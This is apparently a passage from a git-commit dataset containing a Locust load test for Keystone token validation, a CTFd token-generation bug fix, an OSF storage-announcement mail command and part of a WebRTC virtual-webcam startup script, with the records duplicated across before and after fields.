# TODO(lbragstad): Turn this test case into one that supports
# generating an admin token with an admin user, instead of using
# auth_token.
admin_token = 'ADMIN'
headers = {'X-Subject-Token': token,
'X-Auth-Token': admin_token}
for i in range(5):
response = self.client.get(path, headers=headers)
class KeystoneUser(locust.HttpLocust):
task_set = Authenticate
# NOTE(lbragstad): Make this a list of endpoints. Also find a way to pass
# in these endpoints to the scripts instead of having to modify the test
    # every time the endpoint changes.
host = ['http://<api_haproxy_ip>:<port>']
min_wait=1000
max_wait=1000
|
Add multiple endpoint auth and validate test planfrom time import sleep
import locust
import json
class Authenticate(locust.TaskSet):
@locust.task
def authenticate(self):
# Set header information and path
headers = {'content-type': 'application/json'}
path = '/v3/auth/tokens'
# Build authentication request with an existing user. This will be
# an unscoped token request.
request = {
'auth': {
'identity': {
'methods': [
'password'
],
'password': {
'user': {
'id': '9fff846eb28442418612b94fccda9264',
'password': 'sup3rs3cr3t'
}
}
}
}
}
# Since this is a python-request object handed to us on HttpLocust()
# object initialization, we can pass extra stuff if necessary using
# kwargs. Call to POST `/v3/auth/tokens` and capture the response
# object.
response = self.client.post(path, data=json.dumps(request),
headers=headers)
# If we know we can pull a token out of the `X-Subject-Token` header,
# then proceed with the test plan and immediately attempt to validate
# the token several times. Here we are trying to see if we can get
# Keystone to throw a 404.
if response.status_code == 201:
token = response.headers['X-Subject-Token']
# TODO(lbragstad): Turn this test case into one that supports
# generating an admin token with an admin user, instead of using
# auth_token.
admin_token = 'ADMIN'
headers = {'X-Subject-Token': token,
'X-Auth-Token': admin_token}
for i in range(5):
response = self.client.get(path, headers=headers)
class KeystoneUser(locust.HttpLocust):
task_set = Authenticate
# NOTE(lbragstad): Make this a list of endpoints. Also find a way to pass
# in these endpoints to the scripts instead of having to modify the test
    # every time the endpoint changes.
host = ['http://<api_haproxy_ip>:<port>']
min_wait=1000
max_wait=1000
|
<commit_before><commit_msg>Add multiple endpoint auth and validate test plan<commit_after>from time import sleep
import locust
import json
class Authenticate(locust.TaskSet):
@locust.task
def authenticate(self):
# Set header information and path
headers = {'content-type': 'application/json'}
path = '/v3/auth/tokens'
# Build authentication request with an existing user. This will be
# an unscoped token request.
request = {
'auth': {
'identity': {
'methods': [
'password'
],
'password': {
'user': {
'id': '9fff846eb28442418612b94fccda9264',
'password': 'sup3rs3cr3t'
}
}
}
}
}
# Since this is a python-request object handed to us on HttpLocust()
# object initialization, we can pass extra stuff if necessary using
# kwargs. Call to POST `/v3/auth/tokens` and capture the response
# object.
response = self.client.post(path, data=json.dumps(request),
headers=headers)
# If we know we can pull a token out of the `X-Subject-Token` header,
# then proceed with the test plan and immediately attempt to validate
# the token several times. Here we are trying to see if we can get
# Keystone to throw a 404.
if response.status_code == 201:
token = response.headers['X-Subject-Token']
# TODO(lbragstad): Turn this test case into one that supports
# generating an admin token with an admin user, instead of using
# auth_token.
admin_token = 'ADMIN'
headers = {'X-Subject-Token': token,
'X-Auth-Token': admin_token}
for i in range(5):
response = self.client.get(path, headers=headers)
class KeystoneUser(locust.HttpLocust):
task_set = Authenticate
# NOTE(lbragstad): Make this a list of endpoints. Also find a way to pass
# in these endpoints to the scripts instead of having to modify the test
    # every time the endpoint changes.
host = ['http://<api_haproxy_ip>:<port>']
min_wait=1000
max_wait=1000
|
|
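locust's host attribute is a single base-URL string, so the placeholder list in the record would not work as written; a sketch of the parametrization the NOTE asks for, reading the endpoint from the environment (KEYSTONE_ENDPOINT is an assumed variable name and the default is a placeholder):

import os
import locust

class KeystoneUser(locust.HttpLocust):
    task_set = Authenticate  # as defined in the record
    # Hypothetical: take the endpoint from the environment instead of
    # editing the script every time the endpoint changes.
    host = os.environ.get('KEYSTONE_ENDPOINT', 'http://127.0.0.1:5000')
    min_wait = 1000
    max_wait = 1000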
740ea36f7a06989f872150afa91472e3e2c34a03
|
CTFd/utils/security/auth.py
|
CTFd/utils/security/auth.py
|
import datetime
import os
from flask import session
from CTFd.exceptions import UserNotFoundException, UserTokenExpiredException
from CTFd.models import UserTokens, db
from CTFd.utils.encoding import hexencode
from CTFd.utils.security.csrf import generate_nonce
def login_user(user):
session["id"] = user.id
session["name"] = user.name
session["email"] = user.email
session["nonce"] = generate_nonce()
def logout_user():
session.clear()
def generate_user_token(user, expiration=None):
temp_token = True
while temp_token is not None:
value = hexencode(os.urandom(32))
temp_token = UserTokens.query.filter_by(value=value).first()
token = UserTokens(
user_id=user.id, expiration=expiration, value=hexencode(os.urandom(32))
)
db.session.add(token)
db.session.commit()
return token
def lookup_user_token(token):
token = UserTokens.query.filter_by(value=token).first()
if token:
if datetime.datetime.utcnow() >= token.expiration:
raise UserTokenExpiredException
return token.user
else:
raise UserNotFoundException
return None
|
import datetime
import os
from flask import session
from CTFd.exceptions import UserNotFoundException, UserTokenExpiredException
from CTFd.models import UserTokens, db
from CTFd.utils.encoding import hexencode
from CTFd.utils.security.csrf import generate_nonce
def login_user(user):
session["id"] = user.id
session["name"] = user.name
session["email"] = user.email
session["nonce"] = generate_nonce()
def logout_user():
session.clear()
def generate_user_token(user, expiration=None):
temp_token = True
while temp_token is not None:
value = hexencode(os.urandom(32))
temp_token = UserTokens.query.filter_by(value=value).first()
token = UserTokens(
user_id=user.id, expiration=expiration, value=value
)
db.session.add(token)
db.session.commit()
return token
def lookup_user_token(token):
token = UserTokens.query.filter_by(value=token).first()
if token:
if datetime.datetime.utcnow() >= token.expiration:
raise UserTokenExpiredException
return token.user
else:
raise UserNotFoundException
return None
|
Fix tokens using too-random of a value
|
Fix tokens using too-random of a value
|
Python
|
apache-2.0
|
isislab/CTFd,CTFd/CTFd,isislab/CTFd,CTFd/CTFd,ajvpot/CTFd,isislab/CTFd,LosFuzzys/CTFd,ajvpot/CTFd,LosFuzzys/CTFd,CTFd/CTFd,ajvpot/CTFd,LosFuzzys/CTFd,isislab/CTFd,ajvpot/CTFd,LosFuzzys/CTFd,CTFd/CTFd
|
import datetime
import os
from flask import session
from CTFd.exceptions import UserNotFoundException, UserTokenExpiredException
from CTFd.models import UserTokens, db
from CTFd.utils.encoding import hexencode
from CTFd.utils.security.csrf import generate_nonce
def login_user(user):
session["id"] = user.id
session["name"] = user.name
session["email"] = user.email
session["nonce"] = generate_nonce()
def logout_user():
session.clear()
def generate_user_token(user, expiration=None):
temp_token = True
while temp_token is not None:
value = hexencode(os.urandom(32))
temp_token = UserTokens.query.filter_by(value=value).first()
token = UserTokens(
user_id=user.id, expiration=expiration, value=hexencode(os.urandom(32))
)
db.session.add(token)
db.session.commit()
return token
def lookup_user_token(token):
token = UserTokens.query.filter_by(value=token).first()
if token:
if datetime.datetime.utcnow() >= token.expiration:
raise UserTokenExpiredException
return token.user
else:
raise UserNotFoundException
return None
Fix tokens using too-random of a value
|
import datetime
import os
from flask import session
from CTFd.exceptions import UserNotFoundException, UserTokenExpiredException
from CTFd.models import UserTokens, db
from CTFd.utils.encoding import hexencode
from CTFd.utils.security.csrf import generate_nonce
def login_user(user):
session["id"] = user.id
session["name"] = user.name
session["email"] = user.email
session["nonce"] = generate_nonce()
def logout_user():
session.clear()
def generate_user_token(user, expiration=None):
temp_token = True
while temp_token is not None:
value = hexencode(os.urandom(32))
temp_token = UserTokens.query.filter_by(value=value).first()
token = UserTokens(
user_id=user.id, expiration=expiration, value=value
)
db.session.add(token)
db.session.commit()
return token
def lookup_user_token(token):
token = UserTokens.query.filter_by(value=token).first()
if token:
if datetime.datetime.utcnow() >= token.expiration:
raise UserTokenExpiredException
return token.user
else:
raise UserNotFoundException
return None
|
<commit_before>import datetime
import os
from flask import session
from CTFd.exceptions import UserNotFoundException, UserTokenExpiredException
from CTFd.models import UserTokens, db
from CTFd.utils.encoding import hexencode
from CTFd.utils.security.csrf import generate_nonce
def login_user(user):
session["id"] = user.id
session["name"] = user.name
session["email"] = user.email
session["nonce"] = generate_nonce()
def logout_user():
session.clear()
def generate_user_token(user, expiration=None):
temp_token = True
while temp_token is not None:
value = hexencode(os.urandom(32))
temp_token = UserTokens.query.filter_by(value=value).first()
token = UserTokens(
user_id=user.id, expiration=expiration, value=hexencode(os.urandom(32))
)
db.session.add(token)
db.session.commit()
return token
def lookup_user_token(token):
token = UserTokens.query.filter_by(value=token).first()
if token:
if datetime.datetime.utcnow() >= token.expiration:
raise UserTokenExpiredException
return token.user
else:
raise UserNotFoundException
return None
<commit_msg>Fix tokens using too-random of a value<commit_after>
|
import datetime
import os
from flask import session
from CTFd.exceptions import UserNotFoundException, UserTokenExpiredException
from CTFd.models import UserTokens, db
from CTFd.utils.encoding import hexencode
from CTFd.utils.security.csrf import generate_nonce
def login_user(user):
session["id"] = user.id
session["name"] = user.name
session["email"] = user.email
session["nonce"] = generate_nonce()
def logout_user():
session.clear()
def generate_user_token(user, expiration=None):
temp_token = True
while temp_token is not None:
value = hexencode(os.urandom(32))
temp_token = UserTokens.query.filter_by(value=value).first()
token = UserTokens(
user_id=user.id, expiration=expiration, value=value
)
db.session.add(token)
db.session.commit()
return token
def lookup_user_token(token):
token = UserTokens.query.filter_by(value=token).first()
if token:
if datetime.datetime.utcnow() >= token.expiration:
raise UserTokenExpiredException
return token.user
else:
raise UserNotFoundException
return None
|
import datetime
import os
from flask import session
from CTFd.exceptions import UserNotFoundException, UserTokenExpiredException
from CTFd.models import UserTokens, db
from CTFd.utils.encoding import hexencode
from CTFd.utils.security.csrf import generate_nonce
def login_user(user):
session["id"] = user.id
session["name"] = user.name
session["email"] = user.email
session["nonce"] = generate_nonce()
def logout_user():
session.clear()
def generate_user_token(user, expiration=None):
temp_token = True
while temp_token is not None:
value = hexencode(os.urandom(32))
temp_token = UserTokens.query.filter_by(value=value).first()
token = UserTokens(
user_id=user.id, expiration=expiration, value=hexencode(os.urandom(32))
)
db.session.add(token)
db.session.commit()
return token
def lookup_user_token(token):
token = UserTokens.query.filter_by(value=token).first()
if token:
if datetime.datetime.utcnow() >= token.expiration:
raise UserTokenExpiredException
return token.user
else:
raise UserNotFoundException
return None
Fix tokens using too-random of a valueimport datetime
import os
from flask import session
from CTFd.exceptions import UserNotFoundException, UserTokenExpiredException
from CTFd.models import UserTokens, db
from CTFd.utils.encoding import hexencode
from CTFd.utils.security.csrf import generate_nonce
def login_user(user):
session["id"] = user.id
session["name"] = user.name
session["email"] = user.email
session["nonce"] = generate_nonce()
def logout_user():
session.clear()
def generate_user_token(user, expiration=None):
temp_token = True
while temp_token is not None:
value = hexencode(os.urandom(32))
temp_token = UserTokens.query.filter_by(value=value).first()
token = UserTokens(
user_id=user.id, expiration=expiration, value=value
)
db.session.add(token)
db.session.commit()
return token
def lookup_user_token(token):
token = UserTokens.query.filter_by(value=token).first()
if token:
if datetime.datetime.utcnow() >= token.expiration:
raise UserTokenExpiredException
return token.user
else:
raise UserNotFoundException
return None
|
<commit_before>import datetime
import os
from flask import session
from CTFd.exceptions import UserNotFoundException, UserTokenExpiredException
from CTFd.models import UserTokens, db
from CTFd.utils.encoding import hexencode
from CTFd.utils.security.csrf import generate_nonce
def login_user(user):
session["id"] = user.id
session["name"] = user.name
session["email"] = user.email
session["nonce"] = generate_nonce()
def logout_user():
session.clear()
def generate_user_token(user, expiration=None):
temp_token = True
while temp_token is not None:
value = hexencode(os.urandom(32))
temp_token = UserTokens.query.filter_by(value=value).first()
token = UserTokens(
user_id=user.id, expiration=expiration, value=hexencode(os.urandom(32))
)
db.session.add(token)
db.session.commit()
return token
def lookup_user_token(token):
token = UserTokens.query.filter_by(value=token).first()
if token:
if datetime.datetime.utcnow() >= token.expiration:
raise UserTokenExpiredException
return token.user
else:
raise UserNotFoundException
return None
<commit_msg>Fix tokens using too-random of a value<commit_after>import datetime
import os
from flask import session
from CTFd.exceptions import UserNotFoundException, UserTokenExpiredException
from CTFd.models import UserTokens, db
from CTFd.utils.encoding import hexencode
from CTFd.utils.security.csrf import generate_nonce
def login_user(user):
session["id"] = user.id
session["name"] = user.name
session["email"] = user.email
session["nonce"] = generate_nonce()
def logout_user():
session.clear()
def generate_user_token(user, expiration=None):
temp_token = True
while temp_token is not None:
value = hexencode(os.urandom(32))
temp_token = UserTokens.query.filter_by(value=value).first()
token = UserTokens(
user_id=user.id, expiration=expiration, value=value
)
db.session.add(token)
db.session.commit()
return token
def lookup_user_token(token):
token = UserTokens.query.filter_by(value=token).first()
if token:
if datetime.datetime.utcnow() >= token.expiration:
raise UserTokenExpiredException
return token.user
else:
raise UserNotFoundException
return None
|
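The bug fixed above is that a second random value was generated after the uniqueness check, discarding the value that had actually been verified; the loop-until-unique pattern as a standalone sketch (exists() stands in for the UserTokens lookup, and Python 3's bytes.hex() replaces CTFd's hexencode here):

import os

def generate_unique_value(exists, nbytes=32):
    """Draw random hex strings until one passes the caller's uniqueness
    check, then return that same checked value."""
    while True:
        value = os.urandom(nbytes).hex()
        if not exists(value):
            return value

# Usage sketch: exists() would wrap UserTokens.query.filter_by(value=v).first().
token_value = generate_unique_value(lambda v: False)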
30e7e3c8812045ea83ab851181db2312029bacc5
|
osf/management/commands/send_storage_exceeded_announcement.py
|
osf/management/commands/send_storage_exceeded_announcement.py
|
import logging
import json
from tqdm import tqdm
from website import mails
from django.core.management.base import BaseCommand
from osf.models import Node, OSFUser
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def obj_gen(targets):
for u_id, n_dict in targets.items():
try:
u = OSFUser.load(u_id)
priv = [n for n in [Node.load(n_id) for n_id in n_dict.get('private', [])] if not n.is_public]
pub = []
for n_id in n_dict.get('public', []):
# Add previously-public nodes to private list, as 50>5.
# Do not do the reverse.
n = Node.load(n_id)
if n.is_public:
pub.append(n)
else:
priv.append(n)
yield u, pub, priv
except Exception:
logger.error(f'Unknown exception handling {u_id}, skipping')
def main(json_file, dry=False):
if not json_file:
logger.info('No file detected, exiting.')
return
targets = json.load(json_file)
errors = []
p_bar = tqdm(total=len(targets))
i = 1
for user, public_nodes, private_nodes in obj_gen(targets):
if public_nodes or private_nodes:
if not dry:
try:
mails.send_mail(
to_addr=user.username,
mail=mails.STORAGE_CAP_EXCEEDED_ANNOUNCEMENT,
user=user,
public_nodes=public_nodes,
private_nodes=private_nodes,
can_change_preferences=False,
)
except Exception:
errors.append(user._id)
else:
logger.info(f'[Dry] Would mail {user._id}')
p_bar.update(i)
i += 1
p_bar.close()
logger.info(f'Complete. Errors mailing: {errors}')
class Command(BaseCommand):
def add_arguments(self, parser):
super(Command, self).add_arguments(parser)
parser.add_argument(
'--dry',
dest='dry',
action='store_true',
help='Dry run'
)
parser.add_argument(
'--json',
dest='json_file',
type=open,
help='Path of the json input',
)
def handle(self, *args, **options):
json_file = options.get('json_file', None)
dry = options.get('dry', None)
main(json_file, dry)
|
Add storage exceeded announcement script
|
Add storage exceeded announcement script
|
Python
|
apache-2.0
|
Johnetordoff/osf.io,adlius/osf.io,adlius/osf.io,brianjgeiger/osf.io,aaxelb/osf.io,brianjgeiger/osf.io,CenterForOpenScience/osf.io,baylee-d/osf.io,mfraezz/osf.io,brianjgeiger/osf.io,aaxelb/osf.io,mfraezz/osf.io,Johnetordoff/osf.io,felliott/osf.io,cslzchen/osf.io,baylee-d/osf.io,aaxelb/osf.io,adlius/osf.io,felliott/osf.io,cslzchen/osf.io,mfraezz/osf.io,cslzchen/osf.io,baylee-d/osf.io,CenterForOpenScience/osf.io,Johnetordoff/osf.io,felliott/osf.io,aaxelb/osf.io,mfraezz/osf.io,Johnetordoff/osf.io,brianjgeiger/osf.io,adlius/osf.io,CenterForOpenScience/osf.io,cslzchen/osf.io,CenterForOpenScience/osf.io,felliott/osf.io
|
Add storage exceeded announcement script
|
import logging
import json
from tqdm import tqdm
from website import mails
from django.core.management.base import BaseCommand
from osf.models import Node, OSFUser
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def obj_gen(targets):
for u_id, n_dict in targets.items():
try:
u = OSFUser.load(u_id)
priv = [n for n in [Node.load(n_id) for n_id in n_dict.get('private', [])] if not n.is_public]
pub = []
for n_id in n_dict.get('public', []):
# Add previously-public nodes to private list, as 50>5.
# Do not do the reverse.
n = Node.load(n_id)
if n.is_public:
pub.append(n)
else:
priv.append(n)
yield u, pub, priv
except Exception:
logger.error(f'Unknown exception handling {u_id}, skipping')
def main(json_file, dry=False):
if not json_file:
logger.info('No file detected, exiting.')
return
targets = json.load(json_file)
errors = []
p_bar = tqdm(total=len(targets))
i = 1
for user, public_nodes, private_nodes in obj_gen(targets):
if public_nodes or private_nodes:
if not dry:
try:
mails.send_mail(
to_addr=user.username,
mail=mails.STORAGE_CAP_EXCEEDED_ANNOUNCEMENT,
user=user,
public_nodes=public_nodes,
private_nodes=private_nodes,
can_change_preferences=False,
)
except Exception:
errors.append(user._id)
else:
logger.info(f'[Dry] Would mail {user._id}')
p_bar.update(i)
i += 1
p_bar.close()
logger.info(f'Complete. Errors mailing: {errors}')
class Command(BaseCommand):
def add_arguments(self, parser):
super(Command, self).add_arguments(parser)
parser.add_argument(
'--dry',
dest='dry',
action='store_true',
help='Dry run'
)
parser.add_argument(
'--json',
dest='json_file',
type=open,
help='Path of the json input',
)
def handle(self, *args, **options):
json_file = options.get('json_file', None)
dry = options.get('dry', None)
main(json_file, dry)
|
<commit_before><commit_msg>Add storage exceeded announcement script<commit_after>
|
import logging
import json
from tqdm import tqdm
from website import mails
from django.core.management.base import BaseCommand
from osf.models import Node, OSFUser
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def obj_gen(targets):
for u_id, n_dict in targets.items():
try:
u = OSFUser.load(u_id)
priv = [n for n in [Node.load(n_id) for n_id in n_dict.get('private', [])] if not n.is_public]
pub = []
for n_id in n_dict.get('public', []):
# Add previously-public nodes to private list, as 50>5.
# Do not do the reverse.
n = Node.load(n_id)
if n.is_public:
pub.append(n)
else:
priv.append(n)
yield u, pub, priv
except Exception:
logger.error(f'Unknown exception handling {u_id}, skipping')
def main(json_file, dry=False):
if not json_file:
logger.info('No file detected, exiting.')
return
targets = json.load(json_file)
errors = []
p_bar = tqdm(total=len(targets))
i = 1
for user, public_nodes, private_nodes in obj_gen(targets):
if public_nodes or private_nodes:
if not dry:
try:
mails.send_mail(
to_addr=user.username,
mail=mails.STORAGE_CAP_EXCEEDED_ANNOUNCEMENT,
user=user,
public_nodes=public_nodes,
private_nodes=private_nodes,
can_change_preferences=False,
)
except Exception:
errors.append(user._id)
else:
logger.info(f'[Dry] Would mail {user._id}')
p_bar.update(i)
i += 1
p_bar.close()
logger.info(f'Complete. Errors mailing: {errors}')
class Command(BaseCommand):
def add_arguments(self, parser):
super(Command, self).add_arguments(parser)
parser.add_argument(
'--dry',
dest='dry',
action='store_true',
help='Dry run'
)
parser.add_argument(
'--json',
dest='json_file',
type=open,
help='Path of the json input',
)
def handle(self, *args, **options):
json_file = options.get('json_file', None)
dry = options.get('dry', None)
main(json_file, dry)
|
Add storage exceeded announcement scriptimport logging
import json
from tqdm import tqdm
from website import mails
from django.core.management.base import BaseCommand
from osf.models import Node, OSFUser
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def obj_gen(targets):
for u_id, n_dict in targets.items():
try:
u = OSFUser.load(u_id)
priv = [n for n in [Node.load(n_id) for n_id in n_dict.get('private', [])] if not n.is_public]
pub = []
for n_id in n_dict.get('public', []):
# Add previously-public nodes to private list, as 50>5.
# Do not do the reverse.
n = Node.load(n_id)
if n.is_public:
pub.append(n)
else:
priv.append(n)
yield u, pub, priv
except Exception:
logger.error(f'Unknown exception handling {u_id}, skipping')
def main(json_file, dry=False):
if not json_file:
logger.info('No file detected, exiting.')
return
targets = json.load(json_file)
errors = []
p_bar = tqdm(total=len(targets))
i = 1
for user, public_nodes, private_nodes in obj_gen(targets):
if public_nodes or private_nodes:
if not dry:
try:
mails.send_mail(
to_addr=user.username,
mail=mails.STORAGE_CAP_EXCEEDED_ANNOUNCEMENT,
user=user,
public_nodes=public_nodes,
private_nodes=private_nodes,
can_change_preferences=False,
)
except Exception:
errors.append(user._id)
else:
logger.info(f'[Dry] Would mail {user._id}')
p_bar.update(i)
i += 1
p_bar.close()
logger.info(f'Complete. Errors mailing: {errors}')
class Command(BaseCommand):
def add_arguments(self, parser):
super(Command, self).add_arguments(parser)
parser.add_argument(
'--dry',
dest='dry',
action='store_true',
help='Dry run'
)
parser.add_argument(
'--json',
dest='json_file',
type=open,
help='Path of the json input',
)
def handle(self, *args, **options):
json_file = options.get('json_file', None)
dry = options.get('dry', None)
main(json_file, dry)
|
<commit_before><commit_msg>Add storage exceeded announcement script<commit_after>import logging
import json
from tqdm import tqdm
from website import mails
from django.core.management.base import BaseCommand
from osf.models import Node, OSFUser
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def obj_gen(targets):
for u_id, n_dict in targets.items():
try:
u = OSFUser.load(u_id)
priv = [n for n in [Node.load(n_id) for n_id in n_dict.get('private', [])] if not n.is_public]
pub = []
for n_id in n_dict.get('public', []):
# Add previously-public nodes to private list, as 50>5.
# Do not do the reverse.
n = Node.load(n_id)
if n.is_public:
pub.append(n)
else:
priv.append(n)
yield u, pub, priv
except Exception:
logger.error(f'Unknown exception handling {u_id}, skipping')
def main(json_file, dry=False):
if not json_file:
logger.info('No file detected, exiting.')
return
targets = json.load(json_file)
errors = []
p_bar = tqdm(total=len(targets))
i = 1
for user, public_nodes, private_nodes in obj_gen(targets):
if public_nodes or private_nodes:
if not dry:
try:
mails.send_mail(
to_addr=user.username,
mail=mails.STORAGE_CAP_EXCEEDED_ANNOUNCEMENT,
user=user,
public_nodes=public_nodes,
private_nodes=private_nodes,
can_change_preferences=False,
)
except Exception:
errors.append(user._id)
else:
logger.info(f'[Dry] Would mail {user._id}')
p_bar.update(i)
i += 1
p_bar.close()
logger.info(f'Complete. Errors mailing: {errors}')
class Command(BaseCommand):
def add_arguments(self, parser):
super(Command, self).add_arguments(parser)
parser.add_argument(
'--dry',
dest='dry',
action='store_true',
help='Dry run'
)
parser.add_argument(
'--json',
dest='json_file',
type=open,
help='Path of the json input',
)
def handle(self, *args, **options):
json_file = options.get('json_file', None)
dry = options.get('dry', None)
main(json_file, dry)
|
|
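A note on the record above: the management command reads a JSON file keyed by user id, with "public" and "private" lists of node ids (see targets.items() and n_dict.get(...) in obj_gen). A hypothetical input file and invocation, with all ids invented for illustration:
import json

targets = {
    "a1b2c": {"public": ["pub01"], "private": ["prv01", "prv02"]},
}
with open("targets.json", "w") as f:
    json.dump(targets, f)
# then, e.g.: python manage.py send_storage_exceeded_announcement --json targets.json --dry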
73a4d5ab12efc6035a5c44625e1e772fd6c23ffc
|
webrtc/test/buildbot/ensure_webcam_is_running.py
|
webrtc/test/buildbot/ensure_webcam_is_running.py
|
#!/usr/bin/env python
# Copyright (c) 2013 The WebRTC project authors. All Rights Reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
"""Checks if a virtual webcam is running and starts it if not.
Returns a non-zero return code if the webcam could not be started.
Prerequisites:
* Python must have the psutil package installed.
* Windows: a scheduled task named 'ManyCam' must exist and be configured to
launch ManyCam preconfigured to auto-play the test clip.
* Mac: ManyCam must be installed in the default location and be preconfigured
to auto-play the test clip.
* Linux: The v4l2loopback must be loaded to the kernel already (with the
devices=2 argument) and the v4l2_file_player application must be compiled and
put in the location specified below.
"""
import psutil
import subprocess
import sys
WEBCAM_WIN = ['schtasks', '/run', '/tn', 'ManyCam']
WEBCAM_MAC = ['open', '/Applications/ManyCam/ManyCam.app']
WEBCAM_LINUX = (
'$HOME/fake-webcam-driver/linux/v4l2_file_player/v4l2_file_player '
'$HOME/webrtc_video_quality/reference_video.yuv 640 480 /dev/video1 &')
def IsWebCamRunning():
if sys.platform == 'win32':
process_name = 'ManyCam.exe'
elif sys.platform.startswith('darwin'):
process_name = 'ManyCam'
elif sys.platform.startswith('linux'):
process_name = 'v4l2_file_player'
else:
raise Exception('Unsupported platform: %s' % sys.platform)
for p in psutil.get_process_list():
if process_name == p.name:
print 'Found a running virtual webcam (%s with PID %s)' % (p.name, p.pid)
return True
return False
def Main():
if IsWebCamRunning():
return 0
try:
if sys.platform == 'win32':
subprocess.check_call(WEBCAM_WIN)
elif sys.platform.startswith('darwin'):
subprocess.check_call(WEBCAM_MAC)
elif sys.platform.startswith('linux'):
subprocess.check_call(WEBCAM_LINUX, shell=True)
print 'Successfully launched virtual webcam.'
return 0
except Exception as e:
print 'Failed to launch virtual webcam: %s' % e
if __name__ == '__main__':
sys.exit(Main())
|
Add script to ensure virtual webcam is running.
|
Add script to ensure virtual webcam is running.
This script will check that a webcam is running and start it if it's
not currently running.
It's tailored to the way our buildbots are currently configured.
TEST=local execution on Windows, Mac and Linux.
BUG=none
R=phoglund@webrtc.org
Review URL: https://webrtc-codereview.appspot.com/1406005
git-svn-id: 917f5d3ca488f358c4d40eaec14422cf392ccec9@3981 4adac7df-926f-26a2-2b94-8c16560cd09d
|
Python
|
bsd-3-clause
|
mwgoldsmith/libilbc,ShiftMediaProject/libilbc,mwgoldsmith/ilbc,TimothyGu/libilbc,mwgoldsmith/libilbc,TimothyGu/libilbc,ShiftMediaProject/libilbc,mwgoldsmith/libilbc,ShiftMediaProject/libilbc,mwgoldsmith/ilbc,TimothyGu/libilbc,mwgoldsmith/libilbc,TimothyGu/libilbc,mwgoldsmith/ilbc,ShiftMediaProject/libilbc,mwgoldsmith/ilbc,ShiftMediaProject/libilbc,TimothyGu/libilbc
|
Add script to ensure virtual webcam is running.
This script will check that a webcam is running and start it if it's
not currently running.
It's tailored to the way our buildbots are currently configured.
TEST=local execution on Windows, Mac and Linux.
BUG=none
R=phoglund@webrtc.org
Review URL: https://webrtc-codereview.appspot.com/1406005
git-svn-id: 917f5d3ca488f358c4d40eaec14422cf392ccec9@3981 4adac7df-926f-26a2-2b94-8c16560cd09d
|
#!/usr/bin/env python
# Copyright (c) 2013 The WebRTC project authors. All Rights Reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
"""Checks if a virtual webcam is running and starts it if not.
Returns a non-zero return code if the webcam could not be started.
Prerequisites:
* Python must have the psutil package installed.
* Windows: a scheduled task named 'ManyCam' must exist and be configured to
launch ManyCam preconfigured to auto-play the test clip.
* Mac: ManyCam must be installed in the default location and be preconfigured
to auto-play the test clip.
* Linux: The v4l2loopback must be loaded to the kernel already (with the
devices=2 argument) and the v4l2_file_player application must be compiled and
put in the location specified below.
"""
import psutil
import subprocess
import sys
WEBCAM_WIN = ['schtasks', '/run', '/tn', 'ManyCam']
WEBCAM_MAC = ['open', '/Applications/ManyCam/ManyCam.app']
WEBCAM_LINUX = (
'$HOME/fake-webcam-driver/linux/v4l2_file_player/v4l2_file_player '
'$HOME/webrtc_video_quality/reference_video.yuv 640 480 /dev/video1 &')
def IsWebCamRunning():
if sys.platform == 'win32':
process_name = 'ManyCam.exe'
elif sys.platform.startswith('darwin'):
process_name = 'ManyCam'
elif sys.platform.startswith('linux'):
process_name = 'v4l2_file_player'
else:
raise Exception('Unsupported platform: %s' % sys.platform)
for p in psutil.get_process_list():
if process_name == p.name:
print 'Found a running virtual webcam (%s with PID %s)' % (p.name, p.pid)
return True
return False
def Main():
if IsWebCamRunning():
return 0
try:
if sys.platform == 'win32':
subprocess.check_call(WEBCAM_WIN)
elif sys.platform.startswith('darwin'):
subprocess.check_call(WEBCAM_MAC)
elif sys.platform.startswith('linux'):
subprocess.check_call(WEBCAM_LINUX, shell=True)
print 'Successfully launched virtual webcam.'
return 0
except Exception as e:
print 'Failed to launch virtual webcam: %s' % e
if __name__ == '__main__':
sys.exit(Main())
|
<commit_before><commit_msg>Add script to ensure virtual webcam is running.
This script will check that a webcam is running and start it if it's
not currently running.
It's tailored to the way our buildbots are currently configured.
TEST=local execution on Windows, Mac and Linux.
BUG=none
R=phoglund@webrtc.org
Review URL: https://webrtc-codereview.appspot.com/1406005
git-svn-id: 917f5d3ca488f358c4d40eaec14422cf392ccec9@3981 4adac7df-926f-26a2-2b94-8c16560cd09d<commit_after>
|
#!/usr/bin/env python
# Copyright (c) 2013 The WebRTC project authors. All Rights Reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
"""Checks if a virtual webcam is running and starts it if not.
Returns a non-zero return code if the webcam could not be started.
Prerequisites:
* Python must have the psutil package installed.
* Windows: a scheduled task named 'ManyCam' must exist and be configured to
launch ManyCam preconfigured to auto-play the test clip.
* Mac: ManyCam must be installed in the default location and be preconfigured
to auto-play the test clip.
* Linux: The v4l2loopback must be loaded to the kernel already (with the
devices=2 argument) and the v4l2_file_player application must be compiled and
put in the location specified below.
"""
import psutil
import subprocess
import sys
WEBCAM_WIN = ['schtasks', '/run', '/tn', 'ManyCam']
WEBCAM_MAC = ['open', '/Applications/ManyCam/ManyCam.app']
WEBCAM_LINUX = (
'$HOME/fake-webcam-driver/linux/v4l2_file_player/v4l2_file_player '
'$HOME/webrtc_video_quality/reference_video.yuv 640 480 /dev/video1 &')
def IsWebCamRunning():
if sys.platform == 'win32':
process_name = 'ManyCam.exe'
elif sys.platform.startswith('darwin'):
process_name = 'ManyCam'
elif sys.platform.startswith('linux'):
process_name = 'v4l2_file_player'
else:
raise Exception('Unsupported platform: %s' % sys.platform)
for p in psutil.get_process_list():
if process_name == p.name:
print 'Found a running virtual webcam (%s with PID %s)' % (p.name, p.pid)
return True
return False
def Main():
if IsWebCamRunning():
return 0
try:
